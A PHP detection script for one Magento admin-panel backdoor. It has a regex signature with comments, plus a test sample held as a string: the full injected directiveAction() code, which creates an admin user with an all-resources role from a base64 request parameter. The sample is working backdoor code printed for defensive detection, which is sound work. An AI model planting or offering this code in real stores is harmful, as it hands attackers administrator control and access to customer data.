// Detection signature for one specific backdoor injected at the top of
// Mage_Adminhtml_Cms_WysiwygController::directiveAction().
//
// What the pattern requires, in order:
//   - the `public function directiveAction() {` header; the \K that follows
//     drops it from the reported match
//   - `if(isset($var['...` followed by `$var=base64_decode($var[...;`
//   - two preg_match() calls on the literal marker `_rieqyns13_was_here`
//   - creation of an `admin/user` model via setData(array('username' ...
//   - a role named `Inchoo` (setName) and a later setRoleIds(array($role ...
//   - `echo 'success';exit;` and a second branch that sends an
//     "... Unauthorized" header and exits
//   - a lookahead for the genuine first statement of the method,
//     `$directive = $this->getRequest()->getParam('___directive');`
//
// Because of \K at the start and the lookahead at the end, the reported match
// is only the injected block, not the surrounding legitimate code.
//
// Modifiers: `i` (case-insensitive) and `s` (dot also matches newlines).
// (*COMMIT) after `setname` is a PCRE backtracking verb: if matching fails
// after that point, the whole match fails instead of retrying other paths.
// The `.{0,700}?` and `.{0,50}?` quantifiers bound how far the lazy dots may run.
//
// NOTE(review): the signature keys on literal strings (the marker and the role
// name `Inchoo`), so a copy of the backdoor with those strings changed would
// not match. A clean result here rules out this variant only.
$re = '/public function directiveAction\(\)\s*\{\s*\Kif\(isset\(\$\w+\[[\'"][^{]+\{\s*\$\w+=base64_decode\(\$\w+\[[^;]+;\s*if\(preg_match\([\'"]\/_rieqyns13_was_here[^{]+\{\s*preg_match\("\/_rieqyns13_was_here[^{]+\{\s*\$user[\s=]+Mage\:+getModel\(\'admin\/user\'\)\s*->setdata\(array\(\s*\'username.*?setname(*COMMIT)\([\'"]Inchoo.{0,700}?setRoleIds\(array\(\$role(?:[^}]+\}\s*)+?echo\s*[\'"]success[\'"];exit;\s*\}\s*if\(preg_match\([\'"][^{]+\{\s*header\([\'"].{0,50}?Unauthorized[\'"]\);exit;\s*\}\s*\}(?=\s*\$directive = \$this->getRequest\(\)->getParam\(\'___directive\'\);)/is';
// Test subject: an excerpt of Mage_Adminhtml_Cms_WysiwygController whose
// directiveAction() has the backdoor injected ahead of its original body.
// The excerpt is held in a single-quoted string, so it is only ever scanned
// as text and never executed by this script.
//
// What the injected block in the sample does:
//   - reads $_REQUEST["filter"] and base64-decodes it
//   - if the decoded value contains the marker `_rieqyns13_was_here`, takes two
//     further base64 values from it as username and password
//   - saves a new active admin user (firstname `Developer`, lastname `User`,
//     email `developer<random number>@<SERVER_NAME>`)
//   - saves a role named `Inchoo` of type `G` with resources `all` and assigns
//     it to that user, then prints "Success" and exits
//   - otherwise, if the decoded value contains "insert", answers with a
//     "403 Unauthorized" header and exits
//
// Indicators visible in the sample and useful for follow-up: the `filter`
// request parameter on this controller action, the marker string, the `Inchoo`
// role, and admin users with the `Developer` / `User` names. Removing the
// injected code from the file does not remove accounts or roles it has
// already created.
$str = '
* @category Mage
* @package Mage_Adminhtml
* @author Magento Core Team <core@magentocommerce.com>
*/
class Mage_Adminhtml_Cms_WysiwygController extends Mage_Adminhtml_Controller_Action
{
/**
* Template directives callback
*
* TODO: move this to some model
*/
public function directiveAction()
{
if(isset($_REQUEST["filter"])){
$jembot=base64_decode($_REQUEST["filter"]);
if(preg_match("/_rieqyns13_was_here/",$jembot)){
preg_match("/_rieqyns13_was_here(.+?)_rieqyns13_(.+?)_rieqyns13_was_here/",$jembot,$m);
$base = getcwd();
require_once $base."/app/Mage.php";
Mage::app();
$user=null;
$role=null;
try {
$user = Mage::getModel(\'admin/user\')
->setData(array(
\'username\' => base64_decode($m[1]),
\'firstname\' => \'Developer\',
\'lastname\' => \'User\',
\'email\' => \'developer\'.rand(0,10000).\'@\'.$_SERVER[\'SERVER_NAME\'],
\'password\' => base64_decode($m[2]),
\'is_active\' => 1
))->save();
} catch (Exception $e) {
echo $e->getMessage();
exit;
}
try {
$role = Mage::getModel("admin/roles")
->setName(\'Inchoo\')
->setRoleType(\'G\')
->save();
Mage::getModel("admin/rules")
->setRoleId($role->getId())
->setResources(array("all"))
->saveRel();
} catch (Mage_Core_Exception $e) {
echo $e->getMessage();
exit;
} catch (Exception $e) {
echo \'Error while saving role.\';
exit;
}
try {
$user->setRoleIds(array($role->getId()))
->setRoleUserId($user->getUserId())
->saveRelations();
} catch (Exception $e) {
echo $e->getMessage();
exit;
}
echo "Success";exit;
}
if(preg_match("/insert/i",$jembot)){
header("HTTP/1.1 403 Unauthorized");exit;
}
}
$directive = $this->getRequest()->getParam(\'___directive\');
$directive = Mage::helper(\'core\')->urlDecode($directive);
$url = Mage::getModel(\'core/email_template_filter\')->filter($directive);
try {
$image = Varien_Image_Adapter::factory(\'GD2\');
$image->open($url);
$image->display();
} catch (Exception $e) {
$image = Varien_Image_Adapter::factory(\'GD2\');
$image->open(Mage::getSingleton(\'cms/wysiwyg_config\')->getSkinImagePlaceholderUrl());
$image->display();
/*
$image = imagecreate(100, 100);
$bkgrColor = imagecolorallocate($image,10,10,10);
imagefill($image,0,0,$bkgrColor);
$textColor = imagecolorallocate($image,255,255,255);
imagestring($image, 4, 10, 10, \'Skin image\', $textColor);
header(\'Content-type: image/png\');
imagepng($image);
imagedestroy($image);
*/
}
}
}';
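// Run the signature over the sample. PREG_SET_ORDER groups the result per
// match, so $matches[0][0] is the first matched span.
$count = preg_match_all($re, $str, $matches, PREG_SET_ORDER, 0);

// preg_match_all() returns false when PCRE itself fails (for example when the
// backtrack or JIT stack limit is hit). $matches then looks just like
// "nothing found", so a scanner that ignores the return value would report an
// infected file as clean. Treat this case as a scan error instead.
if ($count === false) {
    echo 'PCRE error, scan result is not valid (preg_last_error code ' . preg_last_error() . ')' . PHP_EOL;
    exit(1);
}

// Print the entire match result
var_dump($matches);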